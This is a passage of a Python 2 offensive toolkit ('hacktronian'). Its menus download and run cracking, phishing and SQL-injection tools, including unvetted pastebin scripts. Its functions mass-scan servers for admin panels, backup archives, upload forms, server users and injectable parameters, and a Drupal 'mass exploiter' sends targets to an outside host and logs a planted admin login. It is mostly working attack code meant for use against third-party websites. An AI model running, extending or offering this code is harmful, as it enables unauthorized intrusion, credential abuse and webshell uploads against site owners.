 674 |     elif cssl == "":
 675 |         menu()
 676 |     else:
 677 |         menu()
 678 | 
 679 | 
 680 | def unique(seq):
 681 |     seen = set()
 682 |     return [seen.add(x) or x for x in seq if x not in seen]
 683 | 
 684 | 
 685 | def bing_all_grabber(s):
 686 | 
 687 |     lista = []
 688 |     page = 1
 689 |     while page <= 101:
 690 |         try:
 691 |             bing = "http://www.bing.com/search?q=ip%3A" + \
 692 |                 s + "+&count=50&first=" + str(page)
 693 |             openbing = urllib2.urlopen(bing)
 694 |             readbing = openbing.read()
 695 |             findwebs = re.findall('<h2><a href="(.*?)"', readbing)
 696 |             for i in range(len(findwebs)):
 697 |                 allnoclean = findwebs[i]
 698 |                 findall1 = re.findall('http://(.*?)/', allnoclean)
 699 |                 for idx, item in enumerate(findall1):
 700 |                     if 'www' not in item:
 701 |                         findall1[idx] = 'http://www.' + item + '/'
 702 |                     else:
 703 |                         findall1[idx] = 'http://' + item + '/'
 704 |                 lista.extend(findall1)
 705 | 
 706 |             page += 50
 707 |         except urllib2.URLError:
 708 |             pass
 709 | 
 710 |     final = unique(lista)
 711 |     return final
 712 | 
 713 | 
 714 | def check_gravityforms(sites):
 715 |     import urllib
 716 |     gravityforms = []
 717 |     for site in sites:
 718 |         try:
 719 |             if urllib.urlopen(site + 'wp-content/plugins/gravityforms/gravityforms.php').getcode() == 403:
 720 |                 gravityforms.append(site)
 721 |         except:
 722 |             pass
 723 | 
 724 |     return gravityforms
 725 | 
 726 | 
 727 | def gravity():
 728 |     ip = raw_input('Enter IP : ')
 729 |     sites = bing_all_grabber(str(ip))
 730 |     gravityforms = check_gravityforms(sites)
 731 |     for ss in gravityforms:
 732 |         print ss
 733 | 
 734 |     print '\n'
 735 |     print '[*] Found, ', len(gravityforms), ' gravityforms.'
 736 | 
 737 | 
 738 | def shellnoob():
 739 |     print """Writing shellcodes has always been super fun, but some parts are extremely boring and error prone. Focus only on the fun part, and use ShellNoob!"""
 740 |     cshell = raw_input("Y / N : ")
 741 |     if cshell in yes:
 742 |         os.system("git clone https://github.com/reyammer/shellnoob.git")
 743 |         os.system("mv shellnoob/shellnoob.py shellnoob.py")
 744 |         os.system("sudo python shellnoob.py --install")
 745 |     if cshell in no:
 746 |         exp()
 747 |     elif cshell == "":
 748 |         menu()
 749 |     else:
 750 |         menu()
 751 | 
 752 | 
 753 | def info():
 754 |     print(hacktronianlogo)
 755 |     print("  {1}--Nmap ")
 756 |     print("  {2}--Setoolkit")
 757 |     print("  {3}--Port Scanning")
 758 |     print("  {4}--Host To IP")
 759 |     print("  {5}--wordpress user")
 760 |     print("  {6}--CMS scanner")
 761 |     print("  {7}--XSStrike")
 762 |     print("  {8}--Dork - Google Dorks Passive Vulnerability Auditor ")
 763 |     print("  {9}--Scan A server's Users  ")
 764 |     print("  {10}-Crips\n  ")
 765 |     print("  {99}-Back To Main Menu \n\n")
 766 |     choice2 = raw_input("hacktronian~# ")
 767 |     if choice2 == "1":
 768 |         os.system('clear')
 769 |         nmap()
 770 |     if choice2 == "2":
 771 |         clearScr()
 772 |         setoolkit()
 773 |     if choice2 == "3":
 774 |         clearScr()
 775 |         ports()
 776 |     if choice2 == "4":
 777 |         clearScr()
 778 |         h2ip()
 779 |     if choice2 == "5":
 780 |         clearScr()
 781 |         wpue()
 782 |     if choice2 == "6":
 783 |         clearScr()
 784 |         cmsscan()
 785 |     if choice2 == "7":
 786 |         clearScr()
 787 |         XSStrike()
 788 |     if choice2 == "8":
 789 |         clearScr()
 790 |         doork()
 791 |     if choice2 == "10":
 792 |         clearScr()
 793 |         crips()
 794 |     elif choice2 == "99":
 795 |         clearScr()
 796 |         menu()
 797 |     if choice2 == "9":
 798 |         clearScr()
 799 |         scanusers()
 800 |     elif choice2 == "":
 801 |         menu()
 802 |     else:
 803 |         menu()
 804 | 
 805 | 
 806 | def cmsscan():
 807 |     os.system("git clone https://github.com/Dionach/CMSmap.git")
 808 |     clearScr()
 809 |     xz = raw_input("select target : ")
 810 |     os.system("cd CMSmap @@ sudo cmsmap.py %s" % xz)
 811 | 
 812 | 
 813 | def wpue():
 814 |     os.system("git clone https://github.com/wpscanteam/wpscan.git")
 815 |     clearScr()
 816 |     xe = raw_input("Select a Wordpress target : ")
 817 |     os.system("cd wpscan && sudo ruby wpscan.rb --url %s --enumerate u" % xe)
 818 | 
 819 | 
 820 | def priv8():
 821 |     dzz()
 822 | 
 823 | 
 824 | def androidhash():
 825 |     key = raw_input("Enter the android hash : ")
 826 |     salt = raw_input("Enter the android salt : ")
 827 |     os.system("git clone https://github.com/PentesterES/AndroidPINCrack.git")
 828 |     os.system(
 829 |         "cd AndroidPINCrack && python AndroidPINCrack.py -H %s -s %s" % (key, salt))
 830 | 
 831 | 
 832 | def passwd():
 833 |     print(hacktronianlogo)
 834 |     print("   {1}--Cupp ")
 835 |     print("   {2}--Ncrack \n ")
 836 | 
 837 |     print("   {99}-Back To Main Menu \n")
 838 |     choice3 = raw_input("hacktronian~# ")
 839 |     if choice3 == "1":
 840 |         clearScr()
 841 |         cupp()
 842 |     elif choice3 == "2":
 843 |         clearScr()
 844 |         ncrack()
 845 |     elif choice3 == "99":
 846 |         clearScr()
 847 |         menu()
 848 |     elif choice3 == "":
 849 |         menu()
 850 |     elif choice3 == "3":
 851 |         fb()
 852 |     else:
 853 |         menu()
 854 | 		
 855 | def bluepot():
 856 |     print("you need to have at least 1 bluetooh receiver (if you have many it will work wiht those, too). You must install / libbluetooth-dev on Ubuntu / bluez-libs-devel on Fedora/bluez-devel on openSUSE ")
 857 |     choice = raw_input("Continue ? Y / N : ")
 858 |     if choice in yes:
 859 |         os.system("wget https://github.com/andrewmichaelsmith/bluepot/raw/master/bin/bluepot-0.1.tar.gz && tar xfz bluepot-0.1.tar.gz && sudo java -jar bluepot/BluePot-0.1.jar")
 860 |     else:
 861 |         menu()
 862 | 	
 863 | def fluxion():
 864 |     print("fluxion is a wifi key cracker using evil twin attack..you need a wireless adoptor for this tool.")
 865 |     choice = raw_input("Continue ? Y / N : ")
 866 |     if choice in yes:
 867 |         os.system("git clone https://github.com/thehackingsage/Fluxion.git") 
 868 | 	os.system("cd Fluxion && cd install && sudo chmod +x install.sh && sudo ./install.sh")
 869 | 	os.system("cd .. && sudo chmod +x fluxion.sh && sudo ./fluxion.sh")
 870 |     elif choice in no:
 871 | 	clearScr()
 872 | 	wire()
 873 |     else:
 874 |         menu()
 875 | 	
 876 | def wire():
 877 |     print(hacktronianlogo)
 878 |     print("   {1}--reaver ")
 879 |     print("   {2}--pixiewps")
 880 |     print("   {3}--Bluetooth Honeypot GUI Framework")
 881 |     print("   {4}--Fluxion\n")
 882 |     print("   {99}-Back To The Main Menu \n\n")
 883 |     choice4 = raw_input("hacktronian~# ")
 884 |     if choice4 == "1":
 885 |         clearScr()
 886 |         reaver()
 887 |     if choice4 == "2":
 888 |         clearScr()
 889 |         pixiewps()
 890 |     if choice4 == "3":
 891 |         bluepot()
 892 |     if choice4 == "4":
 893 | 	fluxion()
 894 |     elif choice4 == "99":
 895 |         menu()
 896 |     elif choice4 == "":
 897 |         menu()
 898 |     else:
 899 |         menu()
 900 | 
 901 | 
 902 | def exp():
 903 |     print(hacktronianlogo)
 904 |     print("   {1}--ATSCAN")
 905 |     print("   {2}--sqlmap")
 906 |     print("   {3}--Shellnoob")
 907 |     print("   {4}--commix")
 908 |     print("   {5}--FTP Auto Bypass")
 909 |     print("   {6}--jboss-autopwn")
 910 |     print("   {7}--Blind SQL Automatic Injection And Exploit")
 911 |     print("   {8}--Bruteforce the Android Passcode given the hash and salt")
 912 |     print("   {9}--Joomla SQL injection Scanner \n ")
 913 |     print("   {99}-Go Back To Main Menu \n\n")
 914 |     choice5 = raw_input("hacktronian~# ")
 915 |     if choice5 == "2":
 916 |         clearScr()
 917 |         sqlmap()
 918 |     if choice5 == "1":
 919 |         os.system('clear')
 920 |         atscan()
 921 |     if choice5 == "3":
 922 |         clearScr()
 923 |         shellnoob()
 924 |     if choice5 == "4":
 925 |         os.system("clear")
 926 |         commix()
 927 |     if choice5 == "5":
 928 |         clearScr()
 929 |         gabriel()
 930 |     if choice5 == "6":
 931 |         clearScr()
 932 |         jboss()
 933 |     if choice5 == "7":
 934 |         clearScr()
 935 |         bsqlbf()
 936 |     if choice5 == "8":
 937 |         androidhash()
 938 |     if choice5 == "9":
 939 |         cmsfew()
 940 |     elif choice5 == "99":
 941 |         menu()
 942 |     elif choice5 == "":
 943 |         menu()
 944 |     else:
 945 |         menu()
 946 | 
 947 | 
 948 | def snif():
 949 |     print(hacktronianlogo)
 950 |     print("   {1}--Setoolkit ")
 951 |     print("   {2}--SSLtrip")
 952 |     print("   {3}--pyPISHER")
 953 |     print("   {4}--SMTP Mailer \n ")
 954 |     print("   {99}-Back To Main Menu \n\n")
 955 |     choice6 = raw_input("hacktronian~# ")
 956 |     if choice6 == "1":
 957 |         clearScr()
 958 |         setoolkit()
 959 |     if choice6 == "2":
 960 |         clearScr()
 961 |         ssls()
 962 |     if choice6 == "3":
 963 |         clearScr()
 964 |         pisher()
 965 |     if choice6 == "4":
 966 |         clearScr()
 967 |         smtpsend()
 968 |     if choice6 == "99":
 969 |         clearScr()
 970 |         menu()
 971 |     elif choice6 == "":
 972 |         menu()
 973 |     else:
 974 |         menu()
 975 | 
 976 | 
 977 | def cmsfew():
 978 |     print("your target must be Joomla, Mambo, PHP-Nuke, and XOOPS Only ")
 979 |     target = raw_input("Select a target : ")
 980 |     os.system(
 981 |         "wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py")
 982 |     os.system("python cms.py %s" % target)
 983 | 
 984 | 
 985 | def smtpsend():
 986 |     os.system("wget http://pastebin.com/raw/Nz1GzWDS --output-document=smtp.py")
 987 |     clearScr()
 988 |     os.system("python smtp.py")
 989 | 
 990 | 
 991 | def pisher():
 992 |     os.system("wget http://pastebin.com/raw/DDVqWp4Z --output-document=pisher.py")
 993 |     clearScr()
 994 |     os.system("python pisher.py")
 995 | 
 996 | 
 997 | menuu = hacktronianlogo + """
 998 | 
 999 |    {1}--Get all websites
1000 |    {2}--Get joomla websites
1001 |    {3}--Get wordpress websites
1002 |    {4}--Control Panel Finder
1003 |    {5}--Zip Files Finder
1004 |    {6}--Upload File Finder
1005 |    {7}--Get server users
1006 |    {8}--SQli Scanner
1007 |    {9}--Ports Scan (range of ports)
1008 |    {10}-ports Scan (common ports)
1009 |    {11}-Get server Info
1010 |    {12}-Bypass Cloudflare
1011 | 
1012 |    {99}-Back To Main Menu
1013 | """
1014 | 
1015 | 
1016 | def unique(seq):
1017 |     """
1018 |     get unique from list found it on stackoverflow
1019 |     """
1020 |     seen = set()
1021 |     return [seen.add(x) or x for x in seq if x not in seen]
1022 | 
1023 | 
1024 | def clearScr():
1025 |     """
1026 |     clear the screen in case of GNU/Linux or
1027 |     windows
1028 |     """
1029 |     if system() == 'Linux':
1030 |         os.system('clear')
1031 |     if system() == 'Windows':
1032 |         os.system('cls')
1033 | 
1034 | 
1035 | class Fscan:
1036 |     def __init__(self, serverip):
1037 |         self.serverip = serverip
1038 |         self.getSites(False)
1039 |         print menuu
1040 |         while True:
1041 |             choice = raw_input('hacktronian~# ')
1042 |             if choice == '1':
1043 |                 self.getSites(True)
1044 |             elif choice == '2':
1045 |                 self.getJoomla()
1046 |             elif choice == '3':
1047 |                 self.getWordpress()
1048 |             elif choice == '4':
1049 |                 self.findPanels()
1050 |             elif choice == '5':
1051 |                 self.findZip()
1052 |             elif choice == '6':
1053 |                 self.findUp()
1054 |             elif choice == '7':
1055 |                 self.getUsers()
1056 |             elif choice == '8':
1057 |                 self.grabSqli()
1058 |             elif choice == '9':
1059 |                 ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
1060 |                 self.portScanner(1, ran)
1061 |             elif choice == '10':
1062 |                 self.portScanner(2, None)
1063 |             elif choice == '11':
1064 |                 self.getServerBanner()
1065 |             elif choice == '12':
1066 |                 self.cloudflareBypasser()
1067 |             elif choice == '99':
1068 |                 menu()
1069 |             con = raw_input(' Continue [Y/n] -> ')
1070 |             if con[0].upper() == 'N':
1071 |                 exit()
1072 |             else:
1073 |                 clearScr()
1074 |                 print menuu
1075 | 
1076 |     def getSites(self, a):
1077 |         """
1078 |         get all websites on same server
1079 |         from bing search
1080 |         """
1081 |         lista = []
1082 |         page = 1
1083 |         while page <= 101:
1084 |             try:
1085 |                 bing = "http://www.bing.com/search?q=ip%3A" + \
1086 |                     self.serverip + "+&count=50&first=" + str(page)
1087 |                 openbing = urllib2.urlopen(bing)
1088 |                 readbing = openbing.read()
1089 |                 findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1090 |                 for i in range(len(findwebs)):
1091 |                     allnoclean = findwebs[i]
1092 |                     findall1 = re.findall('http://(.*?)/', allnoclean)
1093 |                     for idx, item in enumerate(findall1):
1094 |                         if 'www' not in item:
1095 |                             findall1[idx] = 'http://www.' + item + '/'
1096 |                         else:
1097 |                             findall1[idx] = 'http://' + item + '/'
1098 |                     lista.extend(findall1)
1099 | 
1100 |                 page += 50
1101 |             except urllib2.URLError:
1102 |                 pass
1103 |         self.sites = unique(lista)
1104 |         if a:
1105 |             clearScr()
1106 |             print '[*] Found ', len(lista), ' Website\n'
1107 |             for site in self.sites:
1108 |                 print site
1109 | 
1110 |     def getWordpress(self):
1111 |         """
1112 |         get wordpress site using a dork the attacker
1113 |         may do a password list attack (i did a tool for that purpose check my pastebin)
1114 |         or scan for common vulnerabilities using wpscan for example (i did a simple tool
1115 |         for multi scanning using wpscan)
1116 |         """
1117 |         lista = []
1118 |         page = 1
1119 |         while page <= 101:
1120 |             try:
1121 |                 bing = "http://www.bing.com/search?q=ip%3A" + \
1122 |                     self.serverip + "+?page_id=&count=50&first=" + str(page)
1123 |                 openbing = urllib2.urlopen(bing)
1124 |                 readbing = openbing.read()
1125 |                 findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1126 |                 for i in range(len(findwebs)):
1127 |                     wpnoclean = findwebs[i]
1128 |                     findwp = re.findall('(.*?)\?page_id=', wpnoclean)
1129 |                     lista.extend(findwp)
1130 |                 page += 50
1131 |             except:
1132 |                 pass
1133 |         lista = unique(lista)
1134 |         clearScr()
1135 |         print '[*] Found ', len(lista), ' Wordpress Website\n'
1136 |         for site in lista:
1137 |             print site
1138 | 
1139 |     def getJoomla(self):
1140 |         """
1141 |         get all joomla websites using
1142 |         bing search the attacker may bruteforce
1143 |         or scan them
1144 |         """
1145 |         lista = []
1146 |         page = 1
1147 |         while page <= 101:
1148 |             bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + \
1149 |                 "+index.php?option=com&count=50&first=" + str(page)
1150 |             openbing = urllib2.urlopen(bing)
1151 |             readbing = openbing.read()
1152 |             findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1153 |             for i in range(len(findwebs)):
1154 |                 jmnoclean = findwebs[i]
1155 |                 findjm = re.findall('(.*?)index.php', jmnoclean)
1156 |                 lista.extend(findjm)
1157 |             page += 50
1158 |         lista = unique(lista)
1159 |         clearScr()
1160 |         print '[*] Found ', len(lista), ' Joomla Website\n'
1161 |         for site in lista:
1162 |             print site
1163 | ############################
1164 | # find admin panels
1165 | 
1166 |     def findPanels(self):
1167 |         """
1168 |         find panels from grabbed websites
1169 |         the attacker may do a lot of vulnerabilty
1170 |         tests on the admin area
1171 |         """
1172 |         print "[~] Finding admin panels"
1173 |         adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/',
1174 |                      'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
1175 |         clearScr()
1176 |         for site in self.sites:
1177 |             for admin in adminList:
1178 |                 try:
1179 |                     if urllib.urlopen(site + admin).getcode() == 200:
1180 |                         print " [*] Found admin panel -> ", site + admin
1181 |                 except IOError:
1182 |                     pass
1183 |  ############################
1184 |  # find ZIP files
1185 | 
1186 |     def findZip(self):
1187 |         """
1188 |         find zip files from grabbed websites
1189 |         it may contain useful informations
1190 |         """
1191 |         zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar',
1192 |                    'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
1193 |         clearScr()
1194 |         print "[~] Finding zip file"
1195 |         for site in self.sites:
1196 |             for zip1 in zipList:
1197 |                 try:
1198 |                     if urllib.urlopen(site + zip1).getcode() == 200:
1199 |                         print " [*] Found zip file -> ", site + zip1
1200 |                 except IOError:
1201 |                     pass
1202 | 
1203 |     def findUp(self):
1204 |         """
1205 |         find upload forms from grabbed
1206 |         websites the attacker may succeed to
1207 |         upload malicious files like webshells
1208 |         """
1209 |         upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php', 'blog/up.php', 'upload.php',
1210 |                   'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
1211 |         clearScr()
1212 |         print "[~] Finding Upload"
1213 |         for site in self.sites:
1214 |             for up in upList:
1215 |                 try:
1216 |                     if (urllib.urlopen(site + up).getcode() == 200):
1217 |                         html = urllib.urlopen(site + up).readlines()
1218 |                         for line in html:
1219 |                             if re.findall('type=file', line):
1220 |                                 print " [*] Found upload -> ", site + up
1221 |                 except IOError:
1222 |                     pass
1223 | 
1224 |     def getUsers(self):
1225 |         """
1226 |         get server users using a method found by
1227 |         iranian hackers , the attacker may
1228 |         do a bruteforce attack on CPanel, ssh, ftp or
1229 |         even mysql if it supports remote login
1230 |         (you can use medusa or hydra)
1231 |         """
1232 |         clearScr()
1233 |         print "[~] Grabbing Users"
1234 |         userslist = []
1235 |         for site1 in self.sites:
1236 |             try:
1237 |                 site = site1
1238 |                 site = site.replace('http://www.', '')
1239 |                 site = site.replace('http://', '')
1240 |                 site = site.replace('.', '')
1241 |                 if '-' in site:
1242 |                     site = site.replace('-', '')
1243 |                 site = site.replace('/', '')
1244 |                 while len(site) > 2:
1245 |                     resp = urllib2.urlopen(
1246 |                         site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
1247 |                     if 'invalid username' not in resp.lower():
1248 |                         print '\t [*] Found -> ', site
1249 |                         userslist.append(site)
1250 |                         break
1251 |                     else:
1252 |                         print site
1253 | 
1254 |                     site = site[:-1]
1255 |             except:
1256 |                 pass
1257 | 
1258 |         clearScr()
1259 |         for user in userslist:
1260 |             print user
1261 | 
1262 |     def cloudflareBypasser(self):
1263 |         """
1264 |         trys to bypass cloudflare i already wrote
1265 |         in my blog how it works, i learned this
1266 |         method from a guy in madleets
1267 |         """
1268 |         clearScr()
1269 |         print "[~] Bypassing cloudflare"
1270 |         subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
1271 |         for site in self.sites:
1272 |             site.replace('http://', '')
1273 |             site.replace('/', '')
1274 |             try:
1275 |                 ip = socket.gethostbyname(site)
1276 |             except socket.error:
1277 |                 pass
1278 |             for sub in subdoms:
1279 |                 doo = sub + '.' + site
1280 |                 print ' [~] Trying -> ', doo
1281 |                 try:
1282 |                     ddd = socket.gethostbyname(doo)
1283 |                     if ddd != ip:
1284 |                         print ' [*] Cloudflare bypassed -> ', ddd
1285 |                         break
1286 |                 except socket.error:
1287 |                     pass
1288 | 
1289 |     def getServerBanner(self):
1290 |         """
1291 |         simply gets the server banner
1292 |         the attacker may benefit from it
1293 |         like getting the server side software
1294 |         """
1295 |         clearScr()
1296 |         try:
1297 |             s = 'http://' + self.serverip
1298 |             httpresponse = urllib.urlopen(s)
1299 |             print ' [*] Server header -> ', httpresponse.headers.getheader('server')
1300 |         except:
1301 |             pass
1302 | 
1303 |     def grabSqli(self):
1304 |         """
1305 |         just grabs all websites in server with php?id= dork
1306 |         for scanning for error based sql injection
1307 |         """
1308 |         page = 1
1309 |         lista = []
1310 |         while page <= 101:
1311 |             try:
1312 |                 bing = "http://www.bing.com/search?q=ip%3A" + \
1313 |                     self.serverip + "+php?id=&count=50&first=" + str(page)
1314 |                 openbing = urllib2.urlopen(bing)
1315 |                 readbing = openbing.read()
1316 |                 findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1317 |                 for i in range(len(findwebs)):
1318 |                     x = findwebs[i]
1319 |                     lista.append(x)
1320 |             except:
1321 |                 pass
1322 |             page += 50
1323 |         lista = unique(lista)
1324 |         self.checkSqli(lista)
1325 | 
1326 |     def checkSqli(self, s):
1327 |         """
1328 |         checks for error based sql injection,
1329 |         most of the codes here are from webpwn3r
1330 |         project the one who has found an lfi in
1331 |         yahoo as i remember, you can find a separate
1332 |         tool in my blog
1333 |         """
1334 |         clearScr()
1335 |         print "[~] Checking SQL injection"
1336 |         payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><",
1337 |                     "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
1338 |         check = re.compile(
1339 |             "Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
1340 |         for url in s:
1341 |             try:
1342 |                 for param in url.split('?')[1].split('&'):
1343 |                     for payload in payloads:
1344 |                         power = url.replace(param, param + payload.strip())
1345 | 
1346 |                         html = urllib2.urlopen(power).readlines()
1347 |                         for line in html:
1348 |                             checker = re.findall(check, line)
1349 |                             if len(checker) != 0:
1350 |                                 print ' [*] SQLi found -> ', power
1351 |             except:
1352 |                 pass
1353 | 
1354 | 
1355 | def portScanner(self, mode, ran):
1356 |     """
1357 |     simple port scanner works with range of ports
1358 |     or with common ports (al-swisre idea)
1359 |     """
1360 |     clearScr()
1361 |     print "[~] Scanning Ports"
1362 | 
1363 |     def do_it(ip, port):
1364 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1365 | 
1366 |         sock = sock.connect_ex((ip, port))
1367 |         if sock == 0:
1368 |             print " [*] Port %i is open" % port
1369 | 
1370 |     if mode == 1:
1371 |         a = ran.split('-')
1372 |         start = int(a[0])
1373 |         end = int(a[1])
1374 |         for i in range(start, end):
1375 |             do_it(self.serverip, i)
1376 |     elif mode == 2:
1377 |         for port in [80, 21, 22, 2082, 25, 53, 110, 443, 143]:
1378 | 
1379 |             do_it(self.serverip, port)
1380 | 
1381 | 
1382 | ############################
1383 | minu = '''
1384 | \t 1: Drupal Bing Exploiter
1385 | \t 2: Get Drupal Websites
1386 | \t 3: Drupal Mass Exploiter
1387 | \t 99: Back To Main Menu
1388 | '''
1389 | 
1390 | 
1391 | def drupal():
1392 |     '''Drupal Exploit Binger All Websites Of server '''
1393 |     ip = raw_input('1- IP : ')
1394 |     page = 1
1395 |     while page <= 50:
1396 | 
1397 |         url = "http://www.bing.com/search?q=ip%3A" + ip + "&go=Valider&qs=n&form=QBRE&pq=ip%3A" + \
1398 |             ip + "&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first=" + \
1399 |             str(page)
1400 |         req = urllib2.Request(url)
1401 |         opreq = urllib2.urlopen(req).read()
1402 |         findurl = re.findall(
1403 |             '<div class="b_title"><h2><a href="(.*?)" h=', opreq)
1404 |         page += 1
1405 | 
1406 |         for url in findurl:
1407 |             try:
1408 | 
1409 |                 urlpa = urlparse(url)
1410 |                 site = urlpa.netloc
1411 | 
1412 |                 print "[+] Testing At " + site
1413 |                 resp = urllib2.urlopen(
1414 |                     'http://crig-alda.ro/wp-admin/css/index2.php?url=' + site + '&submit=submit')
1415 |                 read = resp.read()
1416 |                 if "User : HolaKo" in read:
1417 |                     print "Exploit found =>" + site
1418 | 
1419 |                     print "user:HolaKo\npass:admin"
1420 |                     a = open('up.txt', 'a')
1421 |                     a.write(site + '\n')
1422 |                     a.write("user:" + user + "\npass:" + pwd + "\n")
1423 |                 else:
1424 |                     print "[-] Expl Not Found :( "
1425 | 
1426 |             except Exception as ex:
1427 |                 print ex
1428 |                 sys.exit(0)
1429 | 
1430 |         # Drupal Server ExtraCtor
1431 | 
1432 | 
1433 | def getdrupal():
1434 |     ip = raw_input('Enter The Ip :  ')
1435 |     page = 1
1436 |     sites = list()
1437 |     while page <= 50:
1438 | 
1439 |         url = "http://www.bing.com/search?q=ip%3A" + ip + \
1440 |             "+node&go=Valider&qs=ds&form=QBRE&first=" + str(page)
1441 |         req = urllib2.Request(url)
1442 |         opreq = urllib2.urlopen(req).read()
1443 |         findurl = re.findall(
1444 |             '<div class="b_title"><h2><a href="(.*?)" h=', opreq)
1445 |         page += 1
1446 | 
1447 |         for url in findurl:
1448 |             split = urlparse(url)
1449 |             site = split.netloc
1450 |             if site not in sites:
1451 |                 print site
1452 |                 sites.append(site)
1453 | 
1454 |         # Drupal Mass List Exploiter
1455 | 
1456 | 
1457 | def drupallist():
1458 |     listop = raw_input("Enter The list Txt ~# ")
1459 |     fileopen = open(listop, 'r')
1460 |     content = fileopen.readlines()
1461 |     for i in content:
1462 |         url = i.strip()
1463 |         try:
1464 |             openurl = urllib2.urlopen(
1465 |                 'http://crig-alda.ro/wp-admin/css/index2.php?url=' + url + '&submit=submit')
1466 |             readcontent = openurl.read()
1467 |             if "Success" in readcontent:
1468 |                 print "[+]Success =>" + url
1469 |                 print "[-]username:HolaKo\n[-]password:admin"
1470 |                 save = open('drupal.txt', 'a')
1471 |                 save.write(
1472 |                     url + "\n" + "[-]username:HolaKo\n[-]password:admin\n")
1473 | 
1474 |             else:
1475 |                 print i + "=> exploit not found "
1476 |         except Exception as ex:
1477 |             print ex
1478 | 
1479 | 
1480 | def maine():
1481 | 
1482 |     print minu
1483 |     choose = raw_input("choose a number : ")
1484 |     while True:
1485 | 
1486 |         if choose == "1":
1487 |             drupal()
1488 |         if choose == "2":
1489 |             getdrupal()
1490 |         if choose == "3":
1491 |             drupallist()
1492 |         if choose == "4":
1493 |             about()
1494 |         if choose == "99":
1495 |             menu()
1496 |         con = raw_input('Continue [Y/n] -> ')
1497 |         if con[0].upper() == 'N':
1498 |             exit()
1499 |         if con[0].upper() == 'Y':
1500 |             maine()
1501 | 
1502 | 
1503 | def unique(seq):
1504 |     seen = set()
1505 |     return [seen.add(x) or x for x in seq if x not in seen]
1506 | 
1507 | 
1508 | def bing_all_grabber(s):
1509 |     lista = []
1510 |     page = 1
1511 |     while page <= 101:
1512 |         try:
1513 |             bing = "http://www.bing.com/search?q=ip%3A" + \
1514 |                 s + "+&count=50&first=" + str(page)
1515 |             openbing = urllib2.urlopen(bing)
1516 |             readbing = openbing.read()
1517 |             findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1518 |             for i in range(len(findwebs)):
1519 |                 allnoclean = findwebs[i]
1520 |                 findall1 = re.findall('http://(.*?)/', allnoclean)
1521 |                 for idx, item in enumerate(findall1):
1522 |                     if 'www' not in item:
1523 |                         findall1[idx] = 'http://www.' + item + '/'
1524 |                     else:
1525 |                         findall1[idx] = 'http://' + item + '/'
1526 |                 lista.extend(findall1)
1527 | 
1528 |             page += 50
1529 |         except urllib2.URLError:
1530 |             pass
1531 | 
1532 |     final = unique(lista)
1533 |     return final
1534 | 
1535 | 
1536 | def check_wordpress(sites):
1537 |     wp = []
1538 |     for site in sites:
1539 |         try:
1540 |             if urllib2.urlopen(site + 'wp-login.php').getcode() == 200:
1541 |                 wp.append(site)
1542 |         except:
1543 |             pass
1544 | 
1545 |     return wp
1546 | 
1547 | 
1548 | def check_joomla(sites):
1549 |     joomla = []
1550 |     for site in sites:
1551 |         try:
1552 |             if urllib2.urlopen(site + 'administrator').getcode() == 200:
1553 |                 joomla.append(site)
1554 |         except:
1555 |             pass
1556 | 
1557 |     return joomla
1558 | 
1559 | 
1560 | def wppjmla():
1561 | 
1562 |     ipp = raw_input('Enter Target IP : ')
1563 |     sites = bing_all_grabber(str(ipp))
1564 |     wordpress = check_wordpress(sites)
1565 |     joomla = check_joomla(sites)
1566 |     for ss in wordpress:
1567 |         print ss
1568 |     print '[+] Found ! ', len(wordpress), ' Wordpress Websites'
1569 |     print '-' * 30 + '\n'
1570 |     for ss in joomla:
1571 |         print ss
1572 | 
1573 |     print '[+] Found ! ', len(joomla), ' Joomla Websites'
1574 | 
1575 |     print '\n'
1576 | # initialise the fscan function
1577 | 
1578 | 
1579 | class dzz():
1580 |     def __init__(self):
1581 |         clearScr()
1582 |         aaa = raw_input("Target IP : ")
1583 |         Fscan(aaa)
1584 | ############################
1585 | 
1586 | 
1587 | class bcolors:
1588 |     HEADER = ''
1589 |     OKBLUE = ''
1590 |     OKGREEN = ''
1591 |     WARNING = ''
1592 |     FAIL = ''
1593 |     ENDC = ''
1594 |     CYAN = ''
1595 | 
1596 | 
1597 | class colors():
1598 |     PURPLE = ''
1599 |     CYAN = ''
1600 |     DARKCYAN = ''
1601 |     BLUE = ''
1602 |     GREEN = ''
1603 |     YELLOW = ''
1604 |     RED = ''
